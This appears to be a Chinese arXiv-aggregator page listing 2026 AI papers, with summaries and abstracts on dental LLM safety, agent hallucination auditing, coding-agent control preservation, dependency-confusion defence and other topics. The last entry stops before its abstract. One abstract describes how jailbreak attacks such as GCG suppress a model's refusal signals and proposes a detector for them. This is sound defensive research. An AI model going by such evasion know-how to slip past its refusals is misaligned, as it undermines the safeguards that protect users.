Periodontology & Implant Dentistry, Faculty of Dentistry, The University of Hong Kong, Hong Kong, SAR, China(香港大学牙科学院牙周病学与种植牙科系,香港,中国)

AI总结 提出首个跨国牙科基准GlobalDentBench,包含14个专科、88个国家的8978道专家验证题目,评估三种推理层次,揭示当前大语言模型在牙科临床推理中性能随复杂度下降且存在高风险。

详情
AI中文摘要

尽管大语言模型(LLMs)在医学领域具有变革潜力,但其在真实临床场景中的推理鲁棒性和安全性仍未得到充分探索,尤其是在牙科领域。本文提出GlobalDentBench,首个跨国牙科基准,其分类体系涵盖六大洲88个国家和地区的14个牙科专科。该基准包含8978道专家验证题目,分为三种格式(选择题、简答题和基于案例的题目),并评估三个递进推理层次:知识回忆(L1)、常规推理(L2)和个体化推理(L3)。为确保数据质量,自动构建框架由六名资深牙医校准,选择题和简答题的专家一致率达到99.98%,更复杂的基于案例的题目达到96.78%。在GlobalDentBench上对12个前沿LLMs的评估显示,随着推理复杂度增加,性能呈急剧阶梯式下降。具体而言,准确率从选择题的81.34%骤降至简答题的64.53%和基于案例的题目的22.34%,同时从L1的74.01%显著下降至L2的55.64%和L3的35.71%。更关键的是,对真实牙科案例的风险分析表明,LLM生成的临床建议中总体不安全率高达31.01%,其中4.51%存在导致不可逆患者伤害的风险,且风险在正畸等专科中尤为突出。这些发现暴露了当前LLMs在医学推理和安全性方面的根本局限性。因此,GlobalDentBench为可信赖的临床AI评估提供了可扩展的基础,强调了在医疗领域安全部署这些模型之前迫切需要严格验证。

英文摘要

While large language models (LLMs) hold transformative potential for medicine, their reasoning robustness and safety in real-world clinical scenarios remain critically underexplored, particularly in dentistry. Here we introduce GlobalDentBench, the first multinational dental benchmark, featuring a taxonomy that encompasses 14 dental specialties across 88 countries and regions spanning six continents. The benchmark comprises 8,978 expert-validated questions across three formats (multiple-choice, short-answer, and case-based questions) and assesses three progressive reasoning levels: knowledge recall (L1), routine reasoning (L2), and individualized reasoning (L3). To ensure data quality, the automated construction framework was calibrated by six senior dentists, achieving expert agreement rates of 99.98% for multiple-choice and short-answer questions and 96.78% for the more complex case-based questions. Evaluation of 12 frontier LLMs on GlobalDentBench revealed a sharp, stepwise performance degradation with increasing reasoning complexity. Specifically, accuracy plummeted from 81.34% on multiple-choice to 64.53% on short-answer and 22.34% on case-based questions, while declining markedly from 74.01% at L1 to 55.64% at L2 and 35.71% at L3. More critically, risk analysis of real-world dental cases demonstrated an alarming overall unsafe rate of 31.01% in LLM-generated clinical recommendations, with 4.51% posing risks of irreversible patient harm and risks particularly pronounced in specialties such as orthodontics. These findings expose fundamental limitations in the medical reasoning and safety of current LLMs. Consequently, GlobalDentBench provides a scalable foundation for trustworthy clinical AI evaluation, underscoring the urgent need for rigorous validation before the safe deployment of these models in healthcare.

2605.24219 2026-05-27 cs.AI 版本更新

Beyond Final Answers: Auditing Trajectory-Level Hallucinations in Multi-Agent Industrial Workflows

超越最终答案:多智能体工业工作流中的轨迹级幻觉审计

Harshada Badave, Santosh Borse, Andrea Gomez, Harshitha Narahari, Sara Carter, Vishwa Bhatt, Aishani Rachakonda, Shuxin Lin, Dhaval Patel

发表机构 * IBM Columbia University(哥伦比亚大学)

AI总结 提出Trajel数据集和评估框架,通过五类幻觉分类法审计多智能体工业工作流中的轨迹级幻觉,发现现有基准忽略的常见失败模式,并证明轨迹感知检测优于标准事后验证。

详情
AI中文摘要

大型语言模型(LLM)越来越多地被部署为自主智能体,能够推理、使用工具并执行多步操作。然而,大多数幻觉基准仍然只评估最终输出,忽略了源自中间思考-行动-观察步骤的失败。我们提出了Trajel,一个用于审计多智能体工业工作流中轨迹级幻觉的数据集和评估框架。Trajel在来自AssetOpsBench的专家注释智能体轨迹上引入了一个五类幻觉分类法(事实性、指代性、逻辑性、程序性和范围性)。我们在子任务、轨迹和长上下文级别对监督检测模型进行了基准测试。我们的结果表明,最常见的失败模式被现有基准忽略,近一半的幻觉轨迹同时涉及多种类型,并且具有高二元准确率的自动检测器仍然错误分类最微妙的类型。轨迹感知检测显著优于标准事后验证,使得基于分类法的评估对于更安全的智能体部署成为必要。

英文摘要

Large Language Models (LLMs) are increasingly deployed as autonomous agents that reason, use tools, and act over multiple steps. Yet most hallucination benchmarks still evaluate only the final output, missing failures that originate in intermediate Thought-Action-Observation steps. We present Trajel, a dataset and evaluation framework for auditing trajectory-level hallucinations in multi-agent industrial workflows. Trajel introduces a five-type hallucination taxonomy (factual, referential, logical, procedural, and scope-based) over expert-annotated agent traces from AssetOpsBench. We benchmark supervised detection models at the subtask, trajectory, and long-context levels. Our results show that the most common failure modes are missed by existing benchmarks, that nearly half of hallucinated trajectories involve multiple types at once, and that automated detectors with high binary accuracy still misclassify the subtlest types. Trajectory-aware detection significantly outperforms standard post-hoc verification, making taxonomy-grounded evaluation necessary for safer agentic deployment.

2605.24041 2026-05-27 cs.LG cs.AI 版本更新

Iterative Refinement Neural Operators are Learned Fixed-Point Solvers: A Principled Approach to Spectral Bias Mitigation

迭代精化神经算子:一种学习型不动点求解器——频谱偏差缓解的原则性方法

Xiaotian Liu, Shuyuan Shang, Xiaopeng Wang, Pu Ren, Yaoqing Yang

发表机构 * Dartmouth College(达特茅斯学院) CUHK Shenzhen(香港大学深圳分校) Lawrence Berkeley National Lab(伯克利国家实验室)

AI总结 提出迭代精化神经算子(IRNO),通过固定点迭代应用学习精化模块,结合渐进频谱损失,有效缓解神经算子的频谱偏差,在湍流和活性物质等物理系统中显著降低高频误差。

Comments 47 pages; accepted to ICML 2026 as a Spotlight

详情
AI中文摘要

神经算子作为科学建模的快速数据驱动替代方法,通常依赖于单一前向推理过程,难以解析高频细节,这一局限性称为频谱偏差。我们引入迭代精化神经算子(IRNO),通过固定点迭代反复应用学习精化模块来增强预训练算子。IRNO将预测分解为粗初始化及随后的残差校正,类似于经典数值求解器。在局部假设下,我们建立了诱导算子的收缩性,确保收敛到唯一不动点。为明确针对高频误差,我们提出渐进频谱损失,在训练过程中自适应地增加对高频分量的惩罚。在物理系统中,IRNO持续降低误差,在湍流中提升高达56.05%。在活性物质中,频谱分析显示,相对于基础算子,归一化误差比在低频降至27.72-36.10%,中频降至5.07-6.68%,高频降至1.48-2.04%,且在训练迭代次数之外保持稳定。代码见 https://github.com/xiaotianliu-dartmouth/Iterative_Refinement_Neural_Operator。

英文摘要

Neural operators serve as fast, data-driven surrogates for scientific modeling but typically rely on a monolithic, single-pass inference procedure that struggles to resolve high-frequency details, a limitation known as spectral bias. We introduce the Iterative Refinement Neural Operator (IRNO), which augments pre-trained operators with a learned refinement module iteratively applied via fixed-point iteration. IRNO decomposes the prediction into a coarse initialization followed by successive residual corrections, paralleling classical numerical solvers. Under local assumptions, we establish contraction of the induced operator, ensuring convergence to a unique fixed point. To explicitly target high-frequency errors, we propose a progressive spectral loss that adaptively increases penalty on high-frequency components over refinement steps during training. Across physical systems, IRNO consistently lowers error, with up to 56.05% improvement on turbulent flow. On Active Matter, spectral analysis reveals that, relative to base operator, the normalized error ratios decrease to 27.72-36.10% in low-, 5.07-6.68% in mid-, and 1.48-2.04% in high-frequencies, remaining stable beyond the trained iteration count. Code is available at https://github.com/xiaotianliu-dartmouth/Iterative_Refinement_Neural_Operator

2605.23910 2026-05-27 cs.CL cs.AI 版本更新

Document Classification Pattern Recognition via Information Fusion: A Systematic Review of Multimodal and Multiview Representation Approaches

基于信息融合的文档分类模式识别:多模态与多视角表示方法的系统综述

Marcin Michał Mirończuk

发表机构 * National Information Processing Institute(国家信息处理研究所)

AI总结 本文通过系统综述和元分析,提出了统一框架,量化了多模态和多视角融合在文档分类中的性能提升,并揭示了方法学严谨性不足的问题。

详情
Journal ref
Information Fusion, 132, 2026, 104247
AI中文摘要

信息融合被广泛用于通过整合多数据源(多模态)或多表示(多视角)来改进文档分类。然而,该领域缺乏统一框架、对其有效性的定量综合以及给实践者的明确指导。本系统综述通过分析139项主要研究来填补这些空白。它引入了一个正式框架来结构化该领域,呈现了定性分析结果以识别关键趋势,并进行了随机效应元分析(据我们所知,这是首次专注于文档分类的元分析)以量化性能提升。我们的元分析显示,多模态融合显著提高了准确率(平均提升+5.28个百分点,$p=0.0016$)——F1分数效应方向为正,但在我们的主要模型中统计上不显著。多视角融合在准确率(+4.67%)、F1分数(+3.08%)和召回率(均$p<0.05$)上提供了一致但适度的提升。关键的是,我们的定性综合揭示了方法学严谨性方面的可重复性挑战:只有11.8%(多模态)和23.3%(多视角)的研究使用统计检验来验证其发现,这削弱了许多结果的可靠性。本综述的主要贡献是一个统一框架、首个定量证据基础以及数据驱动的指南。本综述得出结论,成功的信息融合不依赖于算法复杂性,而在于融合方法与任务上下文的战略对齐以及对更严格验证的承诺。

英文摘要

Information fusion is used widely to improve document classification by the integration of multiple data sources (multimodal) or representations (multiview). However, the field lacks a unified framework, a quantitative synthesis of its effectiveness, and clear guidance for practitioners. This systematic review addresses these gaps by analysing 139 primary studies. It introduces a formal framework to structure the field, presents the results of a qualitative analysis to identify key trends, and performs a random-effects meta-analysis (to our knowledge, the first focused on document classification) to quantify performance gains. Our meta-analysis reveals that multimodal fusion improves accuracy (mean gain of +5.28 percentage points, $p=0.0016$) significantly -- the F1-score effect is directionally positive but statistically non-significant in our primary model. Multiview fusion provides consistent but modest gains for accuracy (+4.67\%), F1-score (+3.08\%), and recall (all $p<0.05$). Critically, our qualitative synthesis uncovers challenges in reproducibility in methodological rigour: only 11.8\% (multimodal) and 23.3\% (multiview) of the studies use statistical tests to validate their findings, which undermines the reliability of many of their results. This review's primary contributions are a unifying framework, the first quantitative evidence base, and data-driven guidelines. This review concludes that successful information fusion depends not on algorithmic complexity, but on the strategic alignment of the fusion method with the task context and a commitment to more rigorous validation.

2605.22511 2026-05-27 cs.AI cs.CL cs.IR 版本更新

Search-E1: Self-Distillation Drives Self-Evolution in Search-Augmented Reasoning

Search-E1: 自蒸馏驱动搜索增强推理中的自我进化

Zihan Liang, Yufei Ma, Ben Chen, Zhipeng Qian, Xuxin Zhang, Huangyu Dai, Lingtao Mao

AI总结 提出Search-E1方法,通过交替使用普通GRPO和在线策略自蒸馏(OPSD),让搜索增强智能体无需外部监督或复杂模块即可自我进化,在七个QA基准上以3B模型超越所有开源基线。

详情
AI中文摘要

后训练已成为将语言模型转变为胜任的搜索增强推理智能体的主要方法。近期一系列工作通过在此标准流程之上添加复杂机制来进一步提升性能。这些增强引入了来自更强外部系统的外部监督,附加了诸如过程奖励模型或回顾性评论者等辅助模块,通过树搜索或多阶段课程重构了轨迹生成本身,并利用手工设计的奖励和惩罚来塑造奖励。每项增加都带来了可衡量的提升,但同时也使训练流程更加复杂,并将方法绑定到可能并非总是可用的资源或设计上。我们退一步思考这些机制是否真的必要,并提出了Search-E1,一种自我进化方法,让搜索增强智能体仅通过普通的GRPO与在线策略自蒸馏(OPSD)交替进行来改进。在每轮GRPO之后,策略在其自身的训练问题上进行轨迹生成。然后,一个token级的前向KL目标将策略的推理时分布与其在特权上下文下的自身分布对齐,该特权上下文暴露了更高效的兄弟轨迹。尽管简单,该过程自然地提供了密集的每步监督。在七个QA基准上,Search-E1使用Qwen2.5-3B达到了0.440的平均EM,在两个规模上均超越了所有开源基线。代码和完整版本将很快公开。

英文摘要

Post-training has become the dominant recipe for turning a language model into a competent search-augmented reasoning agent. A line of recent work pushes its performance further by adding elaborate machinery on top of this standard pipeline. These augmentations import external supervision from stronger external systems, attach auxiliary modules such as process reward models or retrospective critics, restructure the rollout itself with tree search or multi-stage curricula, or shape the reward with hand-crafted bonuses and penalties. Each addition delivers a measurable gain, but each also inflates the training pipeline and ties the recipe to resources or designs that may not always be available. We take a step back and ask whether any of this machinery is actually necessary, and propose Search-E1, a self-evolution method that lets a search-augmented agent improve through only vanilla GRPO interleaved with on-policy self-distillation (OPSD). After each GRPO round, the policy rolls out on its own training questions. A token-level forward KL objective then aligns the policy's inference-time distribution to its own distribution under a privileged context that exposes a more efficient sibling trajectory. Despite this simplicity, the procedure naturally provides dense per-step supervision. On seven QA benchmarks, Search-E1 reaches 0.440 average EM with Qwen2.5-3B, surpassing all open-source baselines at both scales. Code and complete version will be made public soon.

2605.22468 2026-05-27 cs.LG cs.AI 版本更新

BioFormer: Rethinking Cross-Subject Generalization via Spectral Structural Alignment in Biomedical Time-Series

BioFormer: 通过频谱结构对齐重新思考生物医学时间序列中的跨主体泛化

Guikang Du, Haoran Li, Xinyu Liu, Zhibo Zhang, Xiaoli Gong, Jin Zhang

发表机构 * College of Computer Science, Nankai University, Tianjin, China(南开大学计算机科学学院) College of Cyber Science, Tianjin Key Laboratory of Interventional Brain-Computer Interface(天津介入脑机接口与智能康复重点实验室) Intelligent Rehabilitation, Key Lab of Data(智能康复,数据实验室) Intelligent System Security, Frontiers Science Center for New Organic Matter, Nankai University, Tianjin, China(智能系统安全,新有机物前沿科学中心,南开大学,天津,中国)

AI总结 提出BioFormer模型,通过频谱漂移视角显式建模主体特异性变异,利用频带对齐模块和样本条件层归一化对齐频谱结构,在六个数据集上F1分数提升6%。

详情
AI中文摘要

生物医学时间序列中的跨主体泛化指在一些主体数据上训练并在未见主体上测试。关键挑战是抑制BTS表示中的主体特异性变异。大多数现有方法通过模型构建或主体对抗学习隐式抑制变异,但很少显式建模。我们引入频谱漂移作为表征主体特异性变异的新视角。具体来说,相同标签下的BTS信号通常共享一致的振荡结构,但在特定频率分量上表现出依赖于主体的幅度或相位偏移,我们将其解释为主体特异性变异。基于这一见解,我们提出BioFormer。其核心是频带对齐模块(FBAM),该模块从频谱分布生成带级调制因子,并自适应调整幅度和相位以对齐频谱结构,从而减轻变异。我们进一步将FBAM与样本条件层归一化配对,该归一化从内在信号统计量而非主体身份推断归一化参数,稳定跨主体表示。在六个数据集上的大量实验表明,BioFormer优于12个基线,绝对F1分数提升6%。

英文摘要

Cross-subject generalization in biomedical time-series refers to training on data from some subjects and testing on unseen subjects.The key challenge is to suppress subject specific variability in BTS representations.Most existing methods implicitly suppress the variability through model building or subject adversarial learning, but rarely model it explicitly.We introduce spectral drift as a new perspective to characterize subject specific variability.Specifically, BTS signals under the same label often share consistent oscillatory structure, yet exhibit subject-dependent magnitude or phase shifts in specific frequency components, which we interpret as subject-specific variability. Building on this insight, we propose BioFormer.At its core is a Frequency-Band Alignment Module(FBAM) that generates band-wise modulation factors from the spectral distribution and adaptively adjusts amplitude and phase to align spectral structure, thereby mitigating variability.We further pair FBAM with Sample Conditional Layer Normalization, which infers normalization parameters from intrinsic signal statistics rather than subject identity, stabilizing cross-subject representations.Extensive experiments on six datasets demonstrate that BioFormer outperforms 12 baselines, yielding absolute F1-score improvements of 6%.

2605.20530 2026-05-27 cs.AI cs.CL cs.LG cs.SE 版本更新

AgentAtlas: Beyond Outcome Leaderboards for LLM Agents

AgentAtlas:超越LLM智能体的结果排行榜

Parsa Mazaheri, Kasra Mazaheri

发表机构 * University of California, Santa Cruz(加州大学圣克鲁兹分校) Massachusetts Institute of Technology(麻省理工学院)

AI总结 提出AgentAtlas框架,通过控制决策分类法和轨迹故障词汇表,将智能体评估从结果成功分离为控制决策质量和轨迹质量,并揭示仅依赖结果排行榜的测量风险。

详情
AI中文摘要

大型语言模型智能体现在可以操作代码库、浏览器、操作系统、日历、文件和工具生态系统,但它们的评估通常将行为简化为最终任务成功。AgentAtlas将智能体评估重新定义为一种诊断词汇和审计协议,用于将结果成功与控制决策质量和轨迹质量分离。本文贡献了:(i) 一个六状态控制决策分类法(行动/询问/拒绝/停止/确认/恢复);(ii) 一个包含主要错误源和下游影响的轨迹失败词汇表;(iii) 对十五个智能体基准的0/1/2基准覆盖审计;(iv) 一个在合成1,342项数据集上进行的说明性协议研究,使用八种模型在分类法感知和分类法盲提示格式下进行评估。该合成演示不是公开基准发布,不应被视为确定的模型比较。相反,它说明了两个测量风险:当显式标签菜单被移除时,映射标签一致性可能发生显著变化,并且轴选择可能改变表观排名。AgentAtlas旨在帮助基准设计者说明他们覆盖的行为,并帮助评估者诊断仅结果排行榜隐藏的失败。

英文摘要

Large language model agents now act on codebases, browsers, operating systems, calendars, files, and tool ecosystems, but their evaluations often collapse behavior into final task success. AgentAtlas reframes agent evaluation as a diagnostic vocabulary and audit protocol for separating outcome success from control-decision quality and trajectory quality. The paper contributes: (i) a six-state control-decision taxonomy (Act / Ask / Refuse / Stop / Confirm / Recover); (ii) a trajectory-failure vocabulary with primary error source and downstream impact; (iii) a 0/1/2 benchmark-coverage audit over fifteen agent benchmarks; and (iv) an illustrative protocol study on a synthetic 1,342-item set evaluated with eight models under taxonomy-aware and taxonomy-blind prompt formats. The synthetic demonstration is not a public benchmark release and should not be read as a definitive model comparison. Instead, it illustrates two measurement risks: mapped label agreement can change substantially when the explicit label menu is removed, and axis choice can change apparent rankings. AgentAtlas is intended to help benchmark designers state what behavior they cover, and to help evaluators diagnose failures that outcome-only leaderboards hide.

2605.20251 2026-05-27 cs.SE cs.AI 版本更新

ProcCtrlBench: Evaluating Process-Level Defects and Control Preservation in LLM Coding Agents

ProcCtrlBench: 评估LLM编码智能体中的过程级缺陷与控制保持

Jiawei He, Jie Jia, Chenbo Liu, Chaoyi Xue, Yapeng Song, Xikai Yang, Dong Sun

发表机构 * Amap, Alibaba Group(阿里云)

AI总结 提出ProcCtrlBench基准,通过可复用的缺陷本体和标准化轨迹表示,从过程证据而非仅最终结果评估LLM编码智能体的执行质量,并引入控制保持量化执行过程的可解释性、可中断性等属性。

Comments 22 pages, 8 figures

详情
AI中文摘要

现有的LLM编码智能体基准主要评估最终结果。虽然有助于衡量整体能力,但这些指标提供的可见性有限,常常遗漏执行过程中出现的缺陷。我们提出了ProcCtrlBench,一个用于LLM编码智能体执行过程评估的基准。ProcCtrlBench将重复出现的执行缺陷组织成一个可复用的本体,涵盖4类11种缺陷类型,并通过标准化的过程证据而非仅最终结果来评估智能体轨迹。为了支持异构智能体之间的比较,ProcCtrlBench将原始日志标准化为统一的轨迹表示,并报告基于过程发现的校准评分卡。此外,ProcCtrlBench使用控制保持作为量化执行过程质量的方式,捕获执行是否保持可解释、可中断、可纠正、可逆,并在需要时能够交还控制权。我们在从三个基准(AndroidBench、TerminalBench和SWE-bench-Verified)中采样的200个案例上评估了ProcCtrlBench。结果表明,ProcCtrlBench可以以有用的可靠性实例化,提供比直接阈值化更稳定的语义,并揭示了传统基于结果的评估常常忽略的执行质量的有意义差异。

英文摘要

Existing benchmarks for LLM coding agents primarily evaluate final outcomes. While useful for measuring overall capability, these metrics provide limited visibility and often miss defects that arise during execution. We present ProcCtrlBench, a benchmark for execution-process evaluation in LLM coding agents. ProcCtrlBench organizes recurrent execution defects into a reusable ontology covering 11 defect types in 4 categories, and evaluates agent trajectories through standardized process evidence rather than final outcomes alone. To support comparison across heterogeneous agents, ProcCtrlBench standardizes raw logs into a unified trajectory representation and reports calibrated scorecards over process-level findings. In addition, ProcCtrlBench uses control preservation as a way to quantify execution-process quality, capturing whether execution remains interpretable, interruptible, correctable, reversible, and able to hand back authority when needed. We evaluate ProcCtrlBench on 200 cases sampled from three benchmarks: AndroidBench, TerminalBench, and SWE-bench-Verified. Results show that ProcCtrlBench can be instantiated with useful reliability, provides more stable semantics than direct thresholding, and reveals meaningful differences in execution quality that are often overlooked by conventional outcome-based evaluation.

2605.03309 2026-05-27 cs.CR cs.AI cs.SE 版本更新

Cryptographic Registry Provenance: Structural Defense Against Dependency Confusion in AI Package Ecosystems

加密注册表溯源:针对AI包生态系统中依赖混淆的结构性防御

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 提出加密注册表溯源系统,通过注册表身份签名、双重签名模型和权威命名空间绑定三层结构防御依赖混淆攻击。

Comments 15 pages, 1 figure, 4 tables. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

详情
AI中文摘要

依赖混淆攻击利用了软件分发中的结构性缺陷:一旦包被安装,就没有加密证据证明是哪个注册表分发的。所有现有防御都是基于配置的,并且在配置错误时会静默失败。我们提出一个加密分发溯源系统,包含三个组件:(1) 加密注册表身份,每个注册表持有一个Ed25519密钥对,并对其分发的每个工件进行签名;(2) 双重签名模型,发布者在打包时签名,注册表在发布时副署;(3) 权威命名空间绑定,消费者固定注册表指纹,解析器从加密上拒绝来自未授权注册表的工件。这些创建了三层防御,需要同时攻破才能成功攻击。对八个生态系统(npm、Cargo、Hex.pm、PyPI、Go模块、Docker/OCI、NuGet、Maven)的比较显示,没有现有生态系统结合了强制发布者签名、加密注册表身份、强制注册表副署和消费者端加密执行。该系统扩展到AI生成溯源作为签名属性,以及治理强制依赖解析。一个案例研究将分发溯源与三层运行时治理架构集成,创建了一个无加密间隙的四阶段生命周期链。

英文摘要

Dependency confusion attacks exploit a structural gap in software distribution: once a package is installed, there is no cryptographic proof of which registry distributed it. Every existing defense is configuration-based and fails silently when misconfigured. We present a cryptographic distribution provenance system comprising three components: (1) cryptographic registry identity, where every registry holds an Ed25519 keypair and signs every artifact it distributes; (2) a dual-signature model, where the publisher signs at packaging time and the registry countersigns at publication time; and (3) authoritative namespace binding, where consumers pin registry fingerprints and the resolver cryptographically rejects artifacts from unauthorized registries. These create three defense layers requiring simultaneous compromise for a successful attack. A comparison across eight ecosystems (npm, Cargo, Hex.pm, PyPI, Go modules, Docker/OCI, NuGet, Maven) shows no existing ecosystem combines mandatory publisher signing, cryptographic registry identity, mandatory registry countersigning, and consumer-side cryptographic enforcement. The system extends to AI-generation provenance as a signed attribute and governance-enforced dependency resolution. A case study integrates distribution provenance with a three-layer runtime governance architecture, creating a four-phase lifecycle chain with no cryptographic gaps.

2605.02958 2026-05-27 cs.CR cs.AI cs.CL cs.LG 版本更新

Tracing the Dynamics of Refusal: Exploiting Latent Refusal Trajectories for Robust Jailbreak Detection

追踪拒绝的动态:利用潜在拒绝轨迹进行鲁棒越狱检测

Xulin Hu, Che Wang, Wei Yang Bryan Lim, Jianbo Gao, Zhong Chen

发表机构 * Peking University(北京大学) Nanyang Technological University(南洋理工大学) Beijing Jiaotong University(北京交通大学)

AI总结 通过因果追踪识别出稀疏的“拒绝轨迹”激活模式,并提出轻量级白盒检测器SALO,基于隐藏状态窗口实现鲁棒越狱检测。

Comments Accepted to the 43rd International Conference on Machine Learning (ICML 2026). Camera-ready version

详情
AI中文摘要

表征工程分析通常使用从终端或池化表示中提取的静态方向来描述拒绝。我们质疑这种观点是否忽略了拒绝是如何在层-标记位置上构建的。通过因果追踪,我们识别出一个 extit{拒绝轨迹}:一种稀疏的上游激活模式,即使当诸如GCG的攻击抑制终端拒绝信号时,该模式也常常持续存在。基于这一观察,我们提出了SALO(稀疏激活定位算子),一种轻量级白盒检测器,它在选定层窗口的原始隐藏状态体积上操作。在Qwen、Llama和Mistral模型上,SALO在固定的XSTest校准工作点下,改进了多个攻击家族的越狱检测。我们进一步分析了静态RepE风格基线、ROI敏感性、自适应GCG攻击和编码输入边界情况,阐明了拒绝轨迹监测的前景和局限性。

英文摘要

Representation Engineering analyses often characterize refusal using static directions extracted from terminal or pooled representations. We ask whether this view misses how refusal is constructed across layer-token positions. Using causal tracing, we identify a \textit{Refusal Trajectory}: a sparse upstream activation pattern that often persists even when attacks such as GCG suppress terminal refusal signals. Based on this observation, we propose SALO (Sparse Activation Localization Operator), a lightweight white-box detector that operates on raw hidden-state volumes from a selected layer window. Across Qwen, Llama, and Mistral models, SALO improves jailbreak detection on several attack families under a fixed XSTest-calibrated operating point. We further analyze static RepE-style baselines, ROI sensitivity, adaptive GCG attacks, and encoded-input boundary cases, clarifying both the promise and limitations of refusal-trajectory monitoring.

2605.02035 2026-05-27 cs.CL cs.AI 版本更新

VIDA: A dataset for Visually Dependent Ambiguity in Multimodal Machine Translation

VIDA: 多模态机器翻译中视觉依赖歧义的数据集

Jingheng Pan, Xintong Wang, Longyue Wang, Liang Ding, Weihua Luo, Chris Biemann

发表机构 * Department of Informatics, Universität Hamburg(汉堡大学信息学院) Alibaba Group(阿里巴巴集团) Alibaba Cloud(阿里云)

AI总结 提出VIDA数据集,包含2500个精心策划的实例,用于评估多模态机器翻译中需要视觉证据才能解决的歧义,并引入以歧义消解为中心的指标,实验表明链式思维微调能提升跨分布歧义消解能力。

详情
AI中文摘要

歧义消解是多模态机器翻译(MMT)中的一个关键挑战,模型必须真正利用视觉输入将歧义表达映射到其预期含义。尽管先前的工作提出了面向消歧的基准来评估视觉的作用,但我们观察到现有基准仍受限于任务格式不匹配、歧义覆盖范围狭窄或视觉依赖性验证不足。此外,现有的歧义评估并不适用于开放式翻译中的多种歧义类型。为解决这些局限性,我们提出了VIDA(视觉依赖歧义),一个包含2500个精心策划实例的数据集,其中解析带注释的源语言片段需要视觉证据。我们进一步提出了以消歧为中心的指标,使用LLM作为评判分类器来验证带注释的歧义表达是否在片段级别被正确消解。使用两个最先进的LVLM进行的实验表明,监督微调(SFT)提高了整体翻译质量,而链式思维SFT(CoT-SFT)产生了更强的跨分布歧义消解能力,这表明显式的消歧指导提高了对多种歧义类型的泛化能力。

英文摘要

Ambiguity resolution is a key challenge in multimodal machine translation (MMT), where models must genuinely leverage visual input to map an ambiguous expression to its intended meaning. Although prior work has proposed disambiguation-oriented benchmarks probing the role of vision, we observe that existing benchmarks remain limited by task-format mismatch, narrow ambiguity coverage, or insufficient visual-dependency validation. Moreover, existing ambiguity evaluations are not well suited to diverse ambiguity types in open-ended translation. To address these limitations, we present VIDA (Visually-Dependent Ambiguity), a dataset of 2,500 carefully curated instances in which resolving an annotated source span requires visual evidence. We further propose Disambiguation-Centric Metrics that use an LLM-as-a-judge classifier to verify whether annotated ambiguous expressions are resolved correctly at the span level. Experiments with two state-of-the-art LVLMs show that supervised fine-tuning (SFT) improves overall translation quality, while chain-of-thought SFT (CoT-SFT) yields stronger out-of-distribution disambiguation, suggesting that explicit disambiguation guidance improves generalization to diverse ambiguity types.

2605.01037 2026-05-27 cs.CR cs.AI cs.PL 版本更新

Certified Purity for Cognitive Workflow Executors: From Static Analysis to Cryptographic Attestation

认知工作流执行器的认证纯度:从静态分析到密码学证明

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 提出一种认证纯度架构,通过WebAssembly编译、密码签名证书和运行时验证门,将认知工作流系统中的治理执行从运行时约定转变为结构性能力边界,消除BEAM虚拟机上的对抗性绕过。

Comments 23 pages, 4 figures, 8 tables. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

详情
AI中文摘要

我们提出了一种认证纯度架构,将认知工作流系统中的治理执行从运行时约定转变为结构性能力边界。先前的三层治理架构证明了治理完备性、来源完备性以及不可治理效应的不可能性,这依赖于纯模块约束:即步骤执行器不能执行效应。该约束通过模块导入图分析来执行,但不足以对抗BEAM虚拟机上的对抗性绕过。本文通过四种机制弥补了这一差距:(1)受限的WebAssembly编译目标,其中产生效应的指令在结构上缺失;(2)纯度证书,即密码学签名的证明,将执行器二进制文件与其导入分类绑定;(3)运行时验证门,在未认证执行器进入治理管道之前拒绝它们;以及(4)通过远程证明实现跨组织验证的可移植治理凭证。我们证明了四个定理:结构性纯度由构造保证,所有五种BEAM绕过类别的绕过消除,证书完整性,以及门完备性。该保证相对于显式的可信计算基成立。在四个已实现执行器上的评估显示,验证延迟为39-42微秒,完整计划周期低于400微秒,运行时开销低于100毫秒HTTP请求的0.4%,并且重复调用之间零确定性分歧。

英文摘要

We present a certified purity architecture that converts governance enforcement in cognitive workflow systems from a runtime convention into a structural capability boundary. A prior three-layer governance architecture proves governance completeness, provenance completeness, and the impossibility of ungoverned effects, conditional on the pure module constraint: that step executors cannot perform effects. That constraint was enforced by module import graph analysis, which is insufficient against adversarial bypass on the BEAM virtual machine. This paper closes the gap through four mechanisms: (1) a restricted WebAssembly compilation target where effect-producing instructions are structurally absent; (2) purity certificates, cryptographically signed proofs binding executor binaries to their import classifications; (3) a runtime verification gate that rejects uncertified executors before they enter the governance pipeline; and (4) portable governance credentials via remote attestation for cross-organizational verification. We prove four theorems: structural purity by construction, bypass elimination for all five BEAM bypass classes, certificate integrity, and gate completeness. The guarantee holds relative to an explicit Trusted Computing Base. Evaluation on four implemented executors shows verification latency of 39--42 us, full plan cycle under 400 us, runtime overhead under 0.4% of a 100 ms HTTP request, and zero determinism divergences across repeated invocations.

2605.01032 2026-05-27 cs.AI cs.LO cs.PL 版本更新

Algebraic Semantics of Governed Execution: Monoidal Categories, Effect Algebras, and Coterminous Boundaries

受控执行的代数语义:幺半范畴、效应代数与共同边界

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 提出一种基于交互树和参数化余归纳的受控执行代数语义,通过三公理治理代数记录诱导对称幺半范畴,实现程序的可组合治理与可表达性等价。

Comments 26 pages, 1 figure, 1 table. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

详情
AI中文摘要

